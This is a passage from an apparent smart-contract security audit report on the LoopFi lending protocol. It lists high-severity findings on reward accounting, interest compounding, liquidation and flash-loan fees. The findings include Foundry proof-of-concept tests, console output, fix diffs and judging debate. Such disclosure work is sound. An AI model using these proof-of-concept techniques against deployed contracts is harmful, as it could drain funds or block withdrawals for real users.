Normal borrower 2 accrued interest: 5766183185603008
Total Debt: 100000000000000000000
Expected Liquidity: 1000000011532366371206016
Available Liquidity: 999900000000000000000000
Utilization: 1
Base Interest Rate: 100023529411764705882352941
Cycle borrower Balance After: 200000000000000000000
To run the test:
forge test --match-test "test_borrow_repay_cycles" -vv
Recommended Mitigation Steps
- Consider adding a fee for taking a loan (including same block loan) to disincentivize this behavior.
- Add a minimum duration for loans, requiring borrowers to hold the loan for a set period before repaying.
0xtj24 (LoopFi) acknowledged and commented:
This is an expected behaviour since the base rate will depend on the utilization rate so if a user borrows rates will increase.
@0xtj24 - Per my understanding, the main issue is a risk free attack to inflate the rates since the attacker doesn’t pay any fee.
@Koolex - I believe this is intended, if the user is borrowing debt, then repaying the debt; i.e., the protocol is making some profit, the interest rate should indeed increase. As the sponsor mentioned, it depends on the utilization rate. This can’t even be considered griefing as the attacker will lose money, as he’ll be continuously paying his debt + some interest.
Hence, I believe this is invalid.
Agree with @0xAlix2. The “attacker” needs to pay off debt himself, so this is not risk-free. Technically this isn’t an attack, more like continuously borrowing/repaying assets and paying the debt, which is do-able on any lending protocol.
The attacker has their balance (before and after) the same
. Stays as-is.
@Koolex - Apologies for replying out of PJQA phase, but I want to point out something that is not mentioned before. I misunderstood this issue in the beginning, and after going through the coded PoC in depth, I believe this is definitely by design and not an issue.
In the coded PoC, it is true
will inflate the rate higher thantest_borrow_repay_cycles_without_attack
, and the “attacker” does not lose anything but gas fee. However, this is due to the fact that borrow rate is compounded, and each time “attacker” triggers a transaction to the CDPVault, the borrow rate is updated.For example, if the borrow rate is 10% per year.
- If rate update is only triggered once 1 year later, the final borrow rate will be
.- However, if it triggered twice (once per half year), the borrow rate will be
105% * 105% = 110.25%
.Similarly, if the rate update is triggered more frequently, the borrow rate would be higher. The key is, there is an upper limit to this (See continuous compounding).
It is actually quite normal for these lending protocols to implement a simple compound mechanism to be triggered per transaction, since it is a much easier design than continuous compounding; E.g., CompoundV2 uses the similar mechanism.
Thus I strongly believe this is by design and not a high severity issue. I’d appreciate if you can reconsider this issue. Thanks!
function _updateBaseInterest( int256 expectedLiquidityDelta, int256 availableLiquidityDelta, bool checkOptimalBorrowing ) internal { uint256 expectedLiquidity_ = (expectedLiquidity().toInt256() + expectedLiquidityDelta).toUint256(); uint256 availableLiquidity_ = (availableLiquidity().toInt256() + availableLiquidityDelta).toUint256(); uint256 lastBaseInterestUpdate_ = lastBaseInterestUpdate; if (block.timestamp != lastBaseInterestUpdate_) { @> _baseInterestIndexLU = _calcBaseInterestIndex(lastBaseInterestUpdate_).toUint128(); // U:[LP-18] lastBaseInterestUpdate = uint40(block.timestamp); } if (block.timestamp != lastQuotaRevenueUpdate) { lastQuotaRevenueUpdate = uint40(block.timestamp); // U:[LP-18] } _expectedLiquidityLU = expectedLiquidity_.toUint128(); // U:[LP-18] _baseInterestRate = ILinearInterestRateModelV3(interestRateModel) .calcBorrowRate({ expectedLiquidity: expectedLiquidity_, availableLiquidity: availableLiquidity_, checkOptimalBorrowing: checkOptimalBorrowing }) .toUint128(); // U:[LP-18] } /// @dev Computes base interest accrued since given timestamp function _calcBaseInterestAccrued(uint256 timestamp) private view returns (uint256) { return (_totalDebt.borrowed * baseInterestRate().calcLinearGrowth(timestamp)) / RAY; } /// @dev Computes current value of base interest index function _calcBaseInterestIndex(uint256 timestamp) private view returns (uint256) { return (_baseInterestIndexLU * (RAY + baseInterestRate().calcLinearGrowth(timestamp))) / RAY; }
Still, the attacker is manipulating the interest rate without risk.
It seems the attacker does not “manipulate” or “inflate” the rate. Instead he is actually increasing the precision of interest calculation. For example, suppose the target rate is
, then for(1+1/t)^t
, the largert
is, the more precise it will be.
@Koolex - What @xuwinnie said is correct, the attacker is actually just making the interest rate more accurate to a continuous compounding, and not maliciously inflating the interest, since the upper bound is always continuous compounding.
I would argue at least this is not a high sev since there are no stealing funds or making borrowers lose pay more interest than they should. The so-called attackers are just making borrowers pay what they are supposed to pay.
@pkqs90 - Compare debts in both cases, they are different even though there was no profit for the protocol. Doing this continuously will increase the rate. This can be utilized in many ways by different actors (including adversaries):
Normal borrower final debt: 50005766476609207981
vsNormal borrower final debt: 50005766183185603008
For transparency, no further comments will be added from my side.
Note: For full discussion, see here.
[H-08] vestTokens
bug in MultiFeeDistribution.sol
causes new incentives to erase previous incentives
Submitted by rscodes, also found by 0xpiken and novamanbg
In MultiFeeDistribution.sol
, the function _notifyReward(address rewardToken, uint256 reward)
does not change r.rewardPerTokenStored
and hence, relies on _updateReward(address account)
to be called before any calls to _notifyReward
. The rest of the functions who call _notifyReward
follows this rule; except for vestTokens
when it is called by a minter to give incentives to the lockers.
function vestTokens(address user, uint256 amount, bool withPenalty) external whenNotPaused {
if (!minters[msg.sender]) revert InsufficientPermission();
if (amount == 0) return;
if (user == address(this)) {
-> // minting to this contract adds the new tokens as incentives for lockers
-> _notifyReward(address(rdntToken), amount);
-> return;
Since _updateReward
is an internal function, we also cannot expect minters to call it on their side before calling vestTokens
Hence, this bug results in rewardData[rewardToken].rewardPerTokenStored
being inaccurate as it will not contain the previous results accumulated by the previous rewardData[rewardToken].rewardPerSecond
when minters call vestTokens
. This results in all lockers losing the rewards previously accumulated by the previous rewardPerSecond
Proof of Concept
01: function test_rewardsGone() public {
02: assert(rewardsDuration == 30 days); // we will use 30 days as the rewardsDuration for convenience
03: address Alice = address(0x123456);
04: uint256 amount = 1 ether;
05: uint256[] memory lockDurations = new uint256[](1);
06: uint256[] memory rewardMultipliers = new uint256[](1);
07: lockDurations[0] = 700 days;
08: rewardMultipliers[0] = 1;
09: multiFeeDistribution.setLockTypeInfo(lockDurations, rewardMultipliers);
11: stakeToken.mint(address(this), amount);
12: multiFeeDistribution.setLPToken(address(stakeToken));
14: multiFeeDistribution.setAddresses(IChefIncentivesController(vm.addr(uint256(keccak256("incentivesController")))), vm.addr(uint256(keccak256("treasury"))));
15: vm.mockCall(
16: vm.addr(uint256(keccak256("incentivesController"))),
17: abi.encodeWithSelector(IChefIncentivesController.afterLockUpdate.selector, Alice),
18: abi.encode(true)
19: );
20: stakeToken.approve(address(multiFeeDistribution), amount);
21: multiFeeDistribution.stake(amount, Alice, 0); // Alice now has 1 ether staked (with lockTypeIndex=0)
22: require(multiFeeDistribution.lockedBalance(Alice) == amount);
24: address[] memory minters = new address[](1);
25: minters[0] = address(this);
26: multiFeeDistribution.setMinters(minters);
28: amount = 10000 ether;
29: loopToken.mint(address(this), amount);
30: loopToken.transfer(address(multiFeeDistribution), amount);
32: vm.mockCall(
33: mockPriceProvider,
34: abi.encodeWithSelector(IPriceProvider.getRewardTokenPrice.selector, address(loopToken), amount),
35: abi.encode(8)
36: );
37: multiFeeDistribution.vestTokens(address(multiFeeDistribution), amount, false); //Minter gives first incentives for lockers
39: skip(31 days);
40: IFeeDistribution.RewardData[] memory rewardsData = multiFeeDistribution.claimableRewards(Alice);
41: require(rewardsData[0].token == address(loopToken));
42: console.log("After the first incentive given |", rewardsData[0].amount);
45: amount = 1 ether;
46: loopToken.mint(address(this), amount);
47: loopToken.transfer(address(multiFeeDistribution), amount);
48: vm.mockCall(
49: mockPriceProvider,
50: abi.encodeWithSelector(IPriceProvider.getRewardTokenPrice.selector, address(loopToken), amount),
51: abi.encode(8)
52: );
53: multiFeeDistribution.vestTokens(address(multiFeeDistribution), amount, false); //Minter gives second incentives for lockers
54: rewardsData = multiFeeDistribution.claimableRewards(Alice);
55: require(rewardsData[0].token == address(loopToken));
56: console.log("Right after second incentive given|", rewardsData[0].amount);
58: skip(31 days);
59: rewardsData = multiFeeDistribution.claimableRewards(Alice);
60: require(rewardsData[0].token == address(loopToken));
61: console.log("After everything ends |", rewardsData[0].amount);
62: }
Console Output:
Ran 1 test for src/test/unit/MultiFeeDistribution.t.sol:MultiFeeDistributionTest
[PASS] test_rewardsGone() (gas: 738287)
After the first incentive given | 9999999999999999999999
Right after second incentive given| 0
After everything ends | 999999999999999999
Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.35ms (1.38ms CPU time)
Ran 1 test suite in 276.54ms (6.35ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests)
Code walkthrough:
- (Line 21) Alice stakes 1 ether to become a locker.
- (Line 37) Trusted minter gives out
10000 ether
as incentive to lockers by callingvestTokens
with parameteruser == address(MultiFeeDistribution)
. - (Line 42) 31 days passed, calling
now show that Alice has9999999999999999999999 tokens
(10 000 ether
) to claim. (Refer to console output). - (Line 53) To further reward lockers, the trusted minter further sends a 2nd incentive of
1 ether
(some time after the first incentive was given out), by again callingvestTokens
with parameteruser == address(MultiFeeDistribution)
. - (Line 56) Now, calling
will show that Alice has0 tokens
to claim, proving that the previous rewards accumulated from the 1st incentive for the user has been erased. - (Line 61) After
for the 2nd incentive ends, we callclaimableRewards
again. We can see from the last line of the console output that only999999999999999999 tokens
(1 ether
) are left. Proving that Alice’s tokens from the first incentive(10 000 ether
) has been erased, and she only retains her share of the rewards coming from the 2nd incentive(1 ether
Recommended Mitigation Steps
function vestTokens(address user, uint256 amount, bool withPenalty) external whenNotPaused {
if (!minters[msg.sender]) revert InsufficientPermission();
if (amount == 0) return;
if (user == address(this)) {
// minting to this contract adds the new tokens as incentives for lockers
+ _updateReward(address(this));
_notifyReward(address(rdntToken), amount);
Adding _updateReward(address(this))
will ensure rewardData[address(rdntToken)].rewardPerTokenStored
is updated accordingly, so that lockers will not lose previously given incentives.
Tools Used
Foundry, VSCode
@Koolex - The report shows a valid scenario where rewards are messed up; however, it is being confirmed by calling
which is just a view function. However, when a user claims his rewards, after the mentioned scenario, he’ll be callinggetReward
which updates the rewards (_updateReward(msg.sender);
), so the impact here is just in aview
function. Hence, I believe this is a low finding.
I believe there is a mistake in the comment above. The issue is not just in a view function. The root cause is the following storage update here.
This is done without actually updating the
from the_updateReward
. As a result the reward for the period between now and the previous update will be erased. For example, check out thevestTokens
function:function vestTokens(address user, uint256 amount, bool withPenalty) external whenNotPaused { if (!minters[msg.sender]) revert InsufficientPermission(); if (amount == 0) return; if (user == address(this)) { // minting to this contract adds the new tokens as incentives for lockers _notifyReward(address(rdntToken), amount); return; }
is called.function _notifyReward(address rewardToken, uint256 reward) internal { address operationExpenseReceiver_ = operationExpenseReceiver; uint256 operationExpenseRatio_ = operationExpenseRatio; if (operationExpenseReceiver_ != address(0) && operationExpenseRatio_ != 0) { uint256 opExAmount = (reward * operationExpenseRatio_) / RATIO_DIVISOR; if (opExAmount != 0) { IERC20(rewardToken).safeTransfer(operationExpenseReceiver_, opExAmount); reward = reward - opExAmount; } } Reward storage r = rewardData[rewardToken]; if (block.timestamp >= r.periodFinish) { r.rewardPerSecond = (reward * 1e12) / rewardsDuration; } else { uint256 remaining = r.periodFinish - block.timestamp; uint256 leftover = (remaining * r.rewardPerSecond) / 1e12; r.rewardPerSecond = ((reward + leftover) * 1e12) / rewardsDuration; } >>> r.lastUpdateTime = block.timestamp;
As you can see the
is set without actually updating therewardPerTokenStored
. So next time the reward is updated, therewardPerToken
will not account for the missed period:function rewardPerToken(address rewardToken) public view returns (uint256 rptStored) { rptStored = rewardData[rewardToken].rewardPerTokenStored; if (lockedSupplyWithMultiplier > 0) { >>> uint256 newReward = (lastTimeRewardApplicable(rewardToken) - rewardData[rewardToken].lastUpdateTime) * rewardData[rewardToken].rewardPerSecond; rptStored = rptStored + ((newReward * 1e18) / lockedSupplyWithMultiplier); }
As the new reward is calculated based on the
which will wrongly be updated anytimevestTokens
is called.He’ll be calling
which updates the rewards (_updateReward(msg.sender);
). When the user actually callsgetReward
the period between the time of callingvestTokens
and the last time_updateReward
was executed will actually be skipped because of the wrong storage update. As a result, anytimevestTokens
is called, thenotifyReward
will skip reward periods erasing rewards, which is indeed a valid High.
[H-09] decreaseLever
uses incorrect position address when withdrawing
Submitted by hash, also found by 0xAlix2, pkqs90, and nnez
will always revert for Position4626
associated vaults.
Proof of Concept
When decreasing lever, the control is passed over to the actual implementation contract for the flashLoan
function decreaseLever(
LeverParams calldata leverParams,
uint256 subCollateral,
address residualRecipient
) external onlyDelegatecall {
// @audit execution passed to the implementation contract by setting it as the callback
// take out credit flash loan
IPermission(leverParams.vault).modifyPermission(leverParams.position, self, true);
uint loanAmount = leverParams.primarySwap.amount;
abi.encode(leverParams, subCollateral, residualRecipient)
IPermission(leverParams.vault).modifyPermission(leverParams.position, self, false);
Inside the onCreditFlashLoan
call, it attempts to withdraw the collateral of the passed in position by the passed in subCollateral
function onCreditFlashLoan(
address /*initiator*/,
uint256 /*amount*/,
uint256 /*fee*/,
bytes calldata data
) external returns (bytes32) {
// sub collateral and debt
// withdraw collateral and handle any CDP specific actions
// @audit should withdraw `subCollateral` amount from `leverParams.position`
=> uint256 withdrawnCollateral = _onDecreaseLever(leverParams, subCollateral);
But the _onDecreaseLever
function of the Position4626
contract is flawed as it attempts to withdraw the collateral from its own address instead of the passed in position
function _onDecreaseLever(
LeverParams memory leverParams,
uint256 subCollateral
) internal override returns (uint256 tokenOut) {
// @audit attempts to withdraw from address(this) rather than leverParams.position
=> uint256 withdrawnCollateral = ICDPVault(leverParams.vault).withdraw(address(this), subCollateral);
Since the collateral is actually present in the passed in position, this attempt to withdraw will cause the call to revert.
Recommended Mitigation Steps
Inside _onDecreaseLever
, withdraw from leverParams.position
Koolex (judge) increased severity to High
[H-10] Debt position interest is compounded while pool interest is simple causing inconsistency between expectedLiquidity_
and availableLiquidity_
Submitted by hash, also found by Afriauditor and monrel
Borrower’s will mostly end up paying more than the required amount of interest. This can also lead to lowered borrowing interest rates and final withdrawals to revert due to the inconsistency between the expected interest amount and the actually paid interest amount.
Proof of Concept
The interest associated with a debt is calculated both in the pool and the user’s debt position. However, the used method for calculation leads to different values between the pool and the debt position. In the pool it is simple linear interest, while for the debt position, the interest gets compounded.
In the pool the interest is calculated as borrowed * interestRate * (elapsedTime/365 days)
function _calcBaseInterestAccrued(uint256 timestamp) private view returns (uint256) {
return (_totalDebt.borrowed * baseInterestRate().calcLinearGrowth(timestamp)) / RAY;
In the CDP vault (i.e., user’s debt position), the interest is calculated as debt * interestIndexNow / interestIndexPast - debt
function _calcDebt(Position memory position) internal view returns (DebtData memory cdd) {
cdd.accruedInterest = CreditLogic.calcAccruedInterest(cdd.debt, cdd.cumulativeIndexLastUpdate, index);
function calcAccruedInterest(uint256 amount, uint256 cumulativeIndexLastUpdate, uint256 cumulativeIndexNow)
returns (uint256)
if (amount == 0) return 0;
return (amount * cumulativeIndexNow) / cumulativeIndexLastUpdate - amount; // U:[CL-1]
Where the interestIndex
is updated as follows:
function _calcBaseInterestIndex(uint256 timestamp) private view returns (uint256) {
return (_baseInterestIndexLU * (RAY + baseInterestRate().calcLinearGrowth(timestamp))) / RAY;
Hence, the interestIndex
gets compounded with every invocation of _calcBaseInterestIndex
, eventually causing a higher interest for the debt position when compared with the pool calculation. This also causes incorrectness between expectedLiquidity_
and availableLiquidity_
(i.e., expectedLiquidity_
will be less than availableLiquidity_
The correct relation between expectedLiquidity_
and availableLiquidity_
is required for _updateBaseInterest
which is used throughout the contract for purposes like withdrawals:
function _withdraw(
address receiver,
address owner,
uint256 assetsSent,
uint256 assetsReceived,
uint256 amountToUser,
uint256 shares
) internal {
if (msg.sender != owner) _spendAllowance({owner: owner, spender: msg.sender, amount: shares}); // U:[LP-8,9]
_burn(owner, shares); // U:[LP-8,9]
expectedLiquidityDelta: -assetsSent.toInt256(),
availableLiquidityDelta: -assetsSent.toInt256(),
checkOptimalBorrowing: false
}); // U:[LP-8,9]
If the associated shares with the excess interest are withdrawn, it will cause an underflow for expectedLiquidity
during final withdrawals
POC Code
Apply the following diff and run forge test --mt testHash_CompoundingVsSimpleInterest
. It is asserted that the calculated interest in the position is more than in the pool and that final withdrawals can revert due to this. The minRate == 0
check in GaugeV3 contract is commented out in order to keep quotaInterest
to 0 so that the only interest being accrued is the base interest, which will make it easier for displaying the difference in its calculation.
diff --git a/src/quotas/GaugeV3.sol b/src/quotas/GaugeV3.sol
index e16d6dc..00574a9 100644
--- a/src/quotas/GaugeV3.sol
+++ b/src/quotas/GaugeV3.sol
@@ -303,9 +303,9 @@ contract GaugeV3 is IGaugeV3, ACLNonReentrantTrait {
/// @dev Checks that given min and max rate are correct (`0 < minRate <= maxRate`)
function _checkParams(uint16 minRate, uint16 maxRate) internal pure {
- if (minRate == 0 || minRate > maxRate) {
- revert IncorrectParameterException(); // U:[GA-04]
- }
+ // if (minRate == 0 || minRate > maxRate) {
+ // revert IncorrectParameterException(); // U:[GA-04]
+ // }
/// @notice Whether token is added to the gauge as quoted
diff --git a/src/test/unit/CDPVault.t.sol b/src/test/unit/CDPVault.t.sol
index 85c82ca..6e324a1 100644
--- a/src/test/unit/CDPVault.t.sol
+++ b/src/test/unit/CDPVault.t.sol
@@ -166,6 +166,81 @@ contract CDPVaultTest is TestBase {
assertEq(credit, 50 ether);
+ function HashCreateGaugeAndSetGauge(address vault) internal virtual {
+ address token_ = address(CDPVault(vault).token());
+ HashCreateGaugeAndSetGauge(vault, token_);
+ }
+ function HashCreateGaugeAndSetGauge(address vault, address token_) internal virtual {
+ quotaKeeper.setCreditManager(address(token_), address(vault));
+ if (!gauge.isTokenAdded(address(token_))) {
+ gauge.addQuotaToken(address(token_), 0, 1);
+ }
+ gauge.setFrozenEpoch(false);
+ vm.warp(block.timestamp + 1 weeks);
+ vm.prank(address(gauge));
+ quotaKeeper.updateRates();
+ }
+ function testHash_CompoundingVsSimpleInterest() public {
+ CDPVault vault = createCDPVault(token, 100 ether, 10 ether, 1.25 ether, 1.0 ether, 0);
+ // the qouta interest is set to 0
+ HashCreateGaugeAndSetGauge(address(vault));
+ token.mint(address(this), 100 ether);
+ token.approve(address(vault), 100 ether);
+ address position = address(new PositionOwner(vault));
+ vault.deposit(position, 100 ether);
+ uint quotaRevenue = liquidityPool.quotaRevenue();
+ assert(quotaRevenue == 0);
+ uint initialExpectedAmount = liquidityPool.expectedLiquidity();
+ vault.borrow(address(this), position, 50 ether);
+ // first interest index update
+ vm.warp(block.timestamp + 1 days);
+ liquidityPool.deposit(0,address(this));
+ // second interest index update
+ vm.warp(block.timestamp + 1 days);
+ liquidityPool.deposit(0,address(this));
+ // quota revenue is 0
+ quotaRevenue = liquidityPool.quotaRevenue();
+ assert(quotaRevenue == 0);
+ uint newExpectedAmount = liquidityPool.expectedLiquidity();
+ uint poolAccruedInterest = newExpectedAmount - initialExpectedAmount;
+ (uint256 debt, uint256 positionAccruedInterest, uint256 cumulativeQuotaInterest)=vault.getDebtInfo(position);
+ assert(debt == 50 ether);
+ assert(cumulativeQuotaInterest == 0);
+ assert(positionAccruedInterest > poolAccruedInterest);
+ // this additional interest will is not accounted in the expected interest
+ mockWETH.mint(address(this), debt + positionAccruedInterest);
+ mockWETH.approve(address(vault), debt + positionAccruedInterest);
+ vault.repay(address(this),position,debt + positionAccruedInterest);
+ // attempt to withdraw all the tokens from the pool will revert since the expectedAmount will underflow
+ {
+ liquidityPool.setLock(false);
+ uint balTreasury = liquidityPool.balanceOf(treasury);
+ uint balThis = liquidityPool.balanceOf(address(this));
+ assert(balTreasury + balThis == liquidityPool.totalSupply());
+ vm.prank(treasury);
+ liquidityPool.withdraw(balTreasury,treasury,treasury);
+ vm.expectRevert("SafeCast: value must be positive");
+ liquidityPool.withdraw(balThis,address(this),address(this));
+ }
+ }
function test_modifyCollateralAndDebt_depositCollateralAndDrawDebt() public {
CDPVault vault = createCDPVault(token, 150 ether, 0, 1.25 ether, 1.0 ether, 0);
Recommended Mitigation Steps
Change the index updation to align with the pool calculation (i.e., interestIndex = prevInterestIndex + baseInterest * timeElapsed
Assessed type
Koolex (judge) increased severity to High
[H-11] It is nearly impossble for Liquidators to use liquidatePosition()
to fully pay off a non bad-debt position
Submitted by pkqs90, also found by Evo
First, we need to know how liquidation of a non bad-debt position works. The liquidator passes the amount repayAmount
, pays a penalty, and buys the position collateral at a discount price.
The issue here is after deducting the penalty, the repayAmount
must be exactly equal to the amount of debt at the current second in order to completely pay off the debt. Aligning with the code, this means the repayAmount * liquidationPenalty
must be equal to calcTotalDebt(debtData)
. If it is larger, the liquidation would fail due to integer underflow in calcDecrease()
However, since the result of calcTotalDebt(debtData)
is increasing as time passes, and the transaction cannot pinpoint which second it is executed, the liquidator cannot know the amount of calcTotalDebt(debtData)
This means it is nearly impossible for liquidators to fully pay off the non bad-debt position, which is unexpected.
function liquidatePosition(address owner, uint256 repayAmount) external whenNotPaused {
// validate params
if (owner == address(0) || repayAmount == 0) revert CDPVault__liquidatePosition_invalidParameters();
// load configs
VaultConfig memory config = vaultConfig;
LiquidationConfig memory liqConfig_ = liquidationConfig;
// load liquidated position
Position memory position = positions[owner];
DebtData memory debtData = _calcDebt(position);
// load price and calculate discounted price
uint256 spotPrice_ = spotPrice();
uint256 discountedPrice = wmul(spotPrice_, liqConfig_.liquidationDiscount);
if (spotPrice_ == 0) revert CDPVault__liquidatePosition_invalidSpotPrice();
// Ensure that there's no bad debt
if (calcTotalDebt(debtData) > wmul(position.collateral, spotPrice_)) revert CDPVault__BadDebt();
// compute collateral to take, debt to repay and penalty to pay
uint256 takeCollateral = wdiv(repayAmount, discountedPrice);
uint256 deltaDebt = wmul(repayAmount, liqConfig_.liquidationPenalty);
uint256 penalty = wmul(repayAmount, WAD - liqConfig_.liquidationPenalty);
if (takeCollateral > position.collateral) revert CDPVault__tooHighRepayAmount();
// verify that the position is indeed unsafe
if (_isCollateralized(calcTotalDebt(debtData), wmul(position.collateral, spotPrice_), config.liquidationRatio))
revert CDPVault__liquidatePosition_notUnsafe();
// transfer the repay amount from the liquidator to the vault
poolUnderlying.safeTransferFrom(msg.sender, address(pool), repayAmount - penalty);
uint256 newDebt;
uint256 profit;
uint256 maxRepayment = calcTotalDebt(debtData);
uint256 newCumulativeIndex;
> if (deltaDebt == maxRepayment) {
newDebt = 0;
newCumulativeIndex = debtData.cumulativeIndexNow;
profit = debtData.accruedInterest;
position.cumulativeQuotaInterest = 0;
} else {
// @auditnote: If deltaDebt > maxRepayment, the following code would underflow and revert.
> (newDebt, newCumulativeIndex, profit, position.cumulativeQuotaInterest) = calcDecrease(
deltaDebt, // delta debt
debtData.cumulativeIndexNow, // current cumulative base interest index in Ray
position.cumulativeQuotaIndexLU = debtData.cumulativeQuotaIndexNow;
// update liquidated position
position = _modifyPosition(owner, position, newDebt, newCumulativeIndex, -toInt256(takeCollateral), totalDebt);
pool.repayCreditAccount(debtData.debt - newDebt, profit, 0); // U:[CM-11]
// transfer the collateral amount from the vault to the liquidator
token.safeTransfer(msg.sender, takeCollateral);
// Mint the penalty from the vault to the treasury
poolUnderlying.safeTransferFrom(msg.sender, address(pool), penalty);
if (debtData.debt - newDebt != 0) {
IPoolV3(pool).updateQuotaRevenue(_calcQuotaRevenueChange(-int(debtData.debt - newDebt))); // U:[PQK-15]
Recommended Mitigation Steps
Add a check where if deltaDebt > maxRepayment
, set the deltaDebt
to maxRepayment
, and reverse calculate the repayAmount
by maxRepayment / liquidationPenalty
0xtj24 (LoopFi) disputed and commented:
Liquidator can estimate the exact debt with:
/// @notice Returns the total debt of a position /// @param position Address of the position /// @return totalDebt Total debt of the position [wad] function virtualDebt(address position) external view returns (uint256) { return calcTotalDebt(_calcDebt(positions[position])); }
and thus repaying the exact position’s debt.
Koolex (judge) increased severity to High and commented:
However, since the result of
) is increasing as time passes, and the transaction cannot pinpoint which second it is executed, the liquidator cannot know the amount ofcalcTotalDebt
).While Liquidator can estimate the exact debt with
, there is a time window between the transaction sent and processed, during this, the debt could increase. Over time, bad debt will accumulate.
While Liquidator can estimate the exact debt with virtualDebt, there is a time window between the transaction sent and processed, during this, the debt could increase. Over time, bad debt will accumulate.
@Koolex - I agree with this; however, this could be considered a user error. Since a user could simply call
liquidatePosition(position, virtualDebt(position))
, the mentioned scenario won’t happen, and everything will work as expected.Hence, I believe this is a valid low.
@0xAlix2 - The point is due to the nature of blockchain, there is a time window between initiation of a transaction and execution of transaction. The initiation of a transaction most likely happen through a frontend request, and not by some blockchain code.
Thank you for the feedback. No mitigation on the front-end could mitigate this. Any suggested mitigation can protect is on-chain. Stays as-is.
[H-12] CDPVault.sol#liquidatePositionBadDebt()
should not set profit = 0
when calling pool.repayCreditAccount()
Submitted by pkqs90, also found by hearmen
should not set profit = 0
when calling pool.repayCreditAccount()
, as this would cause a loss of funds to lpETH stakers.
Bug Description
First we need to understand how liquidatePositionBadDebt()
works. When there is a bad debt detected for a position, any liquidator can come and liquidate the position. The liquidator is required to buy ALL the collateral at a discount price, and the loss (totalDebt - repayAmount
) is sent to PoolV3 to be beared by the lpETH stakers.
This is all good, but the issue here is that when the liquidator repays the debt, it is compared against the totalDebt
of the position, which includes the interest. This interest should also be sent to the lpETH stakers, but is currently not, which would result in loss of funds for the lpETH stakers.
An example:
- CDPVault position has debt principal
== 100
0, debt interest== 500
. Total debt== 1500
. Collateral value== 1600
, discount== 90%
, discount value== 1440
. - Liquidator comes and pay off 1440, loss is
1500-1440 = 60
, sopool.repayCreditAccount(1000, 0, 60)
is called. - The loss is 60, and the same amount of lpETH is burned from the StakingLPEth contract.
However, the issue here is, the liquidator also paid off 440 of debt interest, and is not sent to the StakingLPEth as profit. This means the 440 amount of underlying token (WETH) would be stuck in PoolV3, with no lpETH to redeem it.
Note that the current implementation is similar to GearboxV3. However, the profit concept is completely different, so it is incorrect for LoopFi.
function liquidatePositionBadDebt(address owner, uint256 repayAmount) external whenNotPaused {
// validate params
if (owner == address(0) || repayAmount == 0) revert CDPVault__liquidatePosition_invalidParameters();
// load configs
VaultConfig memory config = vaultConfig;
LiquidationConfig memory liqConfig_ = liquidationConfig;
// load liquidated position
Position memory position = positions[owner];
DebtData memory debtData = _calcDebt(position);
uint256 spotPrice_ = spotPrice();
if (spotPrice_ == 0) revert CDPVault__liquidatePosition_invalidSpotPrice();
// verify that the position is indeed unsafe
if (_isCollateralized(calcTotalDebt(debtData), wmul(position.collateral, spotPrice_), config.liquidationRatio))
revert CDPVault__liquidatePosition_notUnsafe();
// load price and calculate discounted price
uint256 discountedPrice = wmul(spotPrice_, liqConfig_.liquidationDiscount);
// Ensure that the debt is greater than the collateral at discounted price
if (calcTotalDebt(debtData) <= wmul(position.collateral, discountedPrice)) revert CDPVault__noBadDebt();
// compute collateral to take, debt to repay
uint256 takeCollateral = wdiv(repayAmount, discountedPrice);
if (takeCollateral < position.collateral) revert CDPVault__repayAmountNotEnough();
// account for bad debt
takeCollateral = position.collateral;
repayAmount = wmul(takeCollateral, discountedPrice);
uint256 loss = calcTotalDebt(debtData) - repayAmount;
// transfer the repay amount from the liquidator to the vault
poolUnderlying.safeTransferFrom(msg.sender, address(pool), repayAmount);
position.cumulativeQuotaInterest = 0;
position.cumulativeQuotaIndexLU = debtData.cumulativeQuotaIndexNow;
// update liquidated position
position = _modifyPosition(
@> pool.repayCreditAccount(debtData.debt, 0, loss); // U:[CM-11]
// transfer the collateral amount from the vault to the liquidator
token.safeTransfer(msg.sender, takeCollateral);
int256 quotaRevenueChange = _calcQuotaRevenueChange(-int(debtData.debt));
if (quotaRevenueChange != 0) {
IPoolV3(pool).updateQuotaRevenue(quotaRevenueChange); // U:[PQK-15]
function repayCreditAccount(
uint256 repaidAmount,
uint256 profit,
uint256 loss
creditManagerOnly // U:[LP-2C]
whenNotPaused // U:[LP-2A]
nonReentrant // U:[LP-2B]
uint128 repaidAmountU128 = repaidAmount.toUint128();
DebtParams storage cmDebt = _creditManagerDebt[msg.sender];
uint128 cmBorrowed = cmDebt.borrowed;
if (cmBorrowed == 0) {
revert CallerNotCreditManagerException(); // U:[LP-2C,14A]
> if (profit > 0) {
> _mint(treasury, convertToShares(profit)); // U:[LP-14B]
> } else if (loss > 0) {
address treasury_ = treasury;
uint256 sharesInTreasury = balanceOf(treasury_);
uint256 sharesToBurn = convertToShares(loss);
if (sharesToBurn > sharesInTreasury) {
unchecked {
emit IncurUncoveredLoss({
creditManager: msg.sender,
loss: convertToAssets(sharesToBurn - sharesInTreasury)
}); // U:[LP-14D]
sharesToBurn = sharesInTreasury;
_burn(treasury_, sharesToBurn); // U:[LP-14C,14D]
expectedLiquidityDelta: -loss.toInt256(),
availableLiquidityDelta: 0,
checkOptimalBorrowing: false
}); // U:[LP-14B,14C,14D]
_totalDebt.borrowed -= repaidAmountU128; // U:[LP-14B,14C,14D]
cmDebt.borrowed = cmBorrowed - repaidAmountU128; // U:[LP-14B,14C,14D]
emit Repay(msg.sender, repaidAmount, profit, loss); // U:[LP-14B,14C,14D]
Recommended Mitigation Steps
In CDPVault, change to pool.repayCreditAccount(debtData.debt, debtData.accruedInterest, loss)
In PoolV3:
if (profit > 0) {
_mint(treasury, convertToShares(profit)); // U:[LP-14B]
+ }
+ if (loss > 0)
- } else if (loss > 0) {
[H-13] Flashlender.sol#flashLoan()
should use mintProfit()
to mint fees, as the current implementation may lead to locked up WETH in PoolV3
Submitted by pkqs90, also found by 0xAlix2, hearmen, web3km, Bigsam, lian886, Infect3d, Bauchibred, crypticdefense, Spearmint, grearlake, Ruhum, karsar, and hash
When using flashlender to create loans, there is small amount of fees. The fees are sent to PoolV3 and is spread out to the lpETH stakers.
The issue is, the current implementation uses pool.repayCreditAccount()
to add the profit, by setting the profit == fees
. This is incorrect, and the correct implementation should be to use pool.mintProfit()
to send the fees.
Both implementation mints the extra fees as lpETH to the StakingLPEth.sol
contract, which is correct. However, the current implementation does NOT update the expectedLiquidity
, since it assumes the profit
is a part of the interest that should be paid by debt borrowers, and is already included, which is incorrect.
We can see the mintProfit()
function also adds the amount of fees to the expectedLiquidity
, since this is a different kind of fees than debt interest.
The impact of this issue is that the WETH amount in PoolV3 would be larger than expectedLiquidity
